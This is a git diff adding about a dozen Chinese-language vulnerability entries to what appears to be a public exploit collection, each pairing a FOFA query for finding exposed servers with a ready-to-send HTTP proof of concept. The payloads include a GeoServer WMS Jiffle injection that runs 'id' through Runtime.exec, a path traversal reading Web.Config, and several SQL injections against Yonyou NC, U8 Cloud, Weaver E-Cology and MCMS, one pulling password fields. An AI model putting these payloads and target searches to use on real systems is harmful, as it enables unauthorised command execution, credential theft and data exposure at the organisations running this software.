diff --git a/GeoServer系统wms接口存在远程命令执行漏洞.md b/GeoServer系统wms接口存在远程命令执行漏洞.md new file mode 100644 index 0000000..f43b4f6 --- /dev/null +++ b/GeoServer系统wms接口存在远程命令执行漏洞.md @@ -0,0 +1,59 @@ +## GeoServer系统wms接口存在远程命令执行漏洞 + +GeoServer是OGC Web服务器规范的J2EE实现,利用GeoServer可以方便地发布地图数据,允许用户对要素数据进行更新、删除、插入操作,通过GeoServer可以比较容易地在用户之间迅速共享空间地理信息。GeoServer /geoserver/wms接口存在远程命令执行漏洞 + + + +## fofa + +``` +app="GeoServer" +``` + + + +## poc + +```bash +POST /geoserver/wms HTTP/1.1 +Content-Type: application/xml +Accept: */* +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Host: xxx.xxx.xxx.xxx +Content-Length: 1967 +Expect: 100-continue +Connection: close + + + + ras:Jiffle + + + coverage + + + + + + script + + dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("id").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /** + + + + outputType + + DOUBLE + + + + + + result + + + +``` + +![image-20240523190346640](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405231903731.png) \ No newline at end of file diff --git a/LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞.md b/LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞.md new file mode 100644 index 0000000..07496f0 --- /dev/null +++ b/LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞.md @@ -0,0 +1,24 @@ +## LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞 + + + +## fofa + +``` +body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx" +``` + + + +## poc + +``` +GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +``` + diff --git a/LVS精益价值管理系统LVS.Web.ashx存在SQL注入漏洞.md b/LVS精益价值管理系统LVS.Web.ashx存在SQL注入漏洞.md new file mode 100644 index 0000000..7494408 --- /dev/null +++ b/LVS精益价值管理系统LVS.Web.ashx存在SQL注入漏洞.md @@ -0,0 +1,25 @@ +## LVS精益价值管理系统LVS.Web.ashx存在SQL注入漏洞 + + + +## fofa + +``` +body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx" +``` + +## poc + +``` +POST /ajax/LVS.Web.AgencytaskList,LVS.Web.ashx?_method=GetColumnIndex&_session=r HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: text/plain; charset=UTF-8 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive + +src=AgencytaskList +gridid=1' UNION ALL SELECT @@VERSION-- +``` + diff --git a/README.md b/README.md index 3791aea..862d89b 100644 --- a/README.md +++ b/README.md @@ -3,6 +3,21 @@ +## 2024.05.23 新增漏洞 + +- 致远OAV52019系统properties信息泄露漏洞 +- GeoServer系统wms接口存在远程命令执行漏洞 +- 用友NC-complainbilldetail存在SQL注入漏洞 +- 用友NC-downTax存在SQL注入漏洞 +- 宏景eHR-OutputCode存在任意文件读取漏洞 +- 用友U8-Cloud-linkntb.jsp存在SQL注入漏洞(CNVD-C-2023-708748) +- 懒人网址导航页search.html存在SQL注入漏洞 +- LVS精益价值管理系统LVS.Web.ashx存在SQL注入漏洞 +- LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞 +- 泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞 +- 蓝海卓越计费管理系统SQL注入漏洞 +- 铭飞CMS-search接口存在sql注入漏洞 + ## 2024.05.21 新增漏洞 - QNAP-QTS溢出导致的未授权RCE漏洞(CVE-2024-27130) diff --git a/宏景eHR-OutputCode存在任意文件读取漏洞.md b/宏景eHR-OutputCode存在任意文件读取漏洞.md new file mode 100644 index 0000000..d4f38b0 --- /dev/null +++ b/宏景eHR-OutputCode存在任意文件读取漏洞.md @@ -0,0 +1,35 @@ +## 宏景eHR-OutputCode存在任意文件读取漏洞 + + + +## fofa + +``` +app="HJSOFT-HCM" +``` + + + +## poc + +``` +GET /servlet/OutputCode?path=MrEzLLE8pPjFvPfyPAATTP2HJFPAATTPTwqF7eJiXGeHU4B HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Connection: close +``` + +![image-20240523192106336](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405231921421.png) + + + +payload生成工具 + +工具地址:https://github.com/vaycore/HrmsTool/releases/tag/0.1 + +``` +java -jar HrmsTool.jar -e c:/Windows/win.ini +``` + +![image-20240523192205181](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405231922223.png) \ No newline at end of file diff --git a/懒人网址导航页search.html存在SQL注入漏洞.md b/懒人网址导航页search.html存在SQL注入漏洞.md new file mode 100644 index 0000000..c2e1692 --- /dev/null +++ b/懒人网址导航页search.html存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +## 懒人网址导航页search.html存在SQL注入漏洞 + + + +## fofa + +``` +body="./templates/antidote/css/style.css" +``` + + + +## poc + +``` +GET /search.html?keyword='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x2d2d2d2d2d,version(),0x2d2d2d2d2d),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Connection: keep-alive +``` + diff --git a/泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞.md b/泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞.md new file mode 100644 index 0000000..887647d --- /dev/null +++ b/泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞.md @@ -0,0 +1,17 @@ +## 泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞 + +泛微OA E-Cology是一款面向中大型组织的数字化办公产品,它基于全新的设计理念和管理思想,旨在为中大型组织创建一个全新的高效协同办公环境。泛微OA E-Cology Getdata.jsp存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。 + +## fofa + +``` +app="泛微-OA(e-cology)" +``` + +## poc + +``` +http://{{Hostname}}/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager +``` + +![image-20240523193537075](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405231935132.png) \ No newline at end of file diff --git a/用友NC-complainbilldetail存在SQL注入漏洞.md b/用友NC-complainbilldetail存在SQL注入漏洞.md new file mode 100644 index 0000000..ff4638b --- /dev/null +++ b/用友NC-complainbilldetail存在SQL注入漏洞.md @@ -0,0 +1,27 @@ +## 用友NC-complainbilldetail存在SQL注入漏洞 + +NC系统可利用/ebvp/advorappcoll/complainbilldetail接口中的pk_complaint参数进行sql注入,从而窃取服务器的敏感信息。 + + + +## fofa + +``` +app="用友-UFIDA-NC" +``` + + + +## poc + +``` +GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive + +``` + diff --git a/用友NC-downTax存在SQL注入漏洞.md b/用友NC-downTax存在SQL注入漏洞.md new file mode 100644 index 0000000..3ab7c4c --- /dev/null +++ b/用友NC-downTax存在SQL注入漏洞.md @@ -0,0 +1,22 @@ +## 用友NC-downTax存在SQL注入漏洞 + +NC65系统可利用/portal/pt/downTax/download接口中的classid参数进行sql注入,从而窃取服务器的敏感信息。 + +## fofa + +``` +app="用友-UFIDA-NC" +``` + +## poc + +``` +GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +``` + diff --git a/用友U8-Cloud-linkntb.jsp存在SQL注入漏洞(CNVD-C-2023-708748).md b/用友U8-Cloud-linkntb.jsp存在SQL注入漏洞(CNVD-C-2023-708748).md new file mode 100644 index 0000000..e1d35b8 --- /dev/null +++ b/用友U8-Cloud-linkntb.jsp存在SQL注入漏洞(CNVD-C-2023-708748).md @@ -0,0 +1,25 @@ +## 用友U8-Cloud-linkntb.jsp存在SQL注入漏洞(CNVD-C-2023-708748) + + + +## fofa + +``` +title="U8C" +app="用友-U8-Cloud" +``` + + + +## poc + +``` +GET /yer/html/nodes/linkntb/linkntb.jsp?pageId=linkntb&billId=1%27%29+AND+5846%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%285846%3D5846%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29--+Astq&djdl=1&rand=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: text/plain; charset=UTF-8 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +``` + diff --git a/致远OAV52019系统properties信息泄露漏洞.md b/致远OAV52019系统properties信息泄露漏洞.md new file mode 100644 index 0000000..7c6d1ea --- /dev/null +++ b/致远OAV52019系统properties信息泄露漏洞.md @@ -0,0 +1,22 @@ +## 致远OAV52019系统properties信息泄露漏洞 + + + +## fofa + +``` +app="致远互联-OA" +``` + + + +## poc + +``` +GET /seeyon/rest/m3/common/system/properties HTTP/1.1 +Host: your-ip + + +``` + +![image-20240523190028981](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405231900072.png) \ No newline at end of file diff --git a/蓝海卓越计费管理系统SQL注入漏洞.md b/蓝海卓越计费管理系统SQL注入漏洞.md new file mode 100644 index 0000000..b819c5a --- /dev/null +++ b/蓝海卓越计费管理系统SQL注入漏洞.md @@ -0,0 +1,34 @@ +## 蓝海卓越计费管理系统SQL注入漏洞 + + + +## fofa + +``` +title=="蓝海卓越计费管理系统" +``` + + + +## poc + +``` +GET /ajax/loaduser.php?UserName=aaa%27 HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Connection: keep-alive +Cookie: PHPSESSID=r1me93qh1lsje0ece8n0ma9c54 +Host: your-ip +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 +``` + +![image-20240523194234425](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405231942480.png) + +![image-20240523194330249](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405231943309.png) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/aUB1XBvGcSFDFgfd-IG8tA \ No newline at end of file diff --git a/铭飞CMS-search接口存在sql注入漏洞.md b/铭飞CMS-search接口存在sql注入漏洞.md new file mode 100644 index 0000000..c5b2df0 --- /dev/null +++ b/铭飞CMS-search接口存在sql注入漏洞.md @@ -0,0 +1,26 @@ +## 铭飞CMS-search接口存在sql注入漏洞 + + + +## fofa + +``` +body="铭飞MCMS" || body="/mdiy/formData/save.do" || body="static/plugins/ms/1.0.0/ms.js" +``` + + + +## poc + +``` +GET /mcms/search.do'%20AND%20EXTRACTVALUE(5225,CONCAT(0x5c,md5(8789),user(),0x71767a7071))%20AND%20'smmD'='smmD=1 HTTP/1.1 +Host: +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 +``` +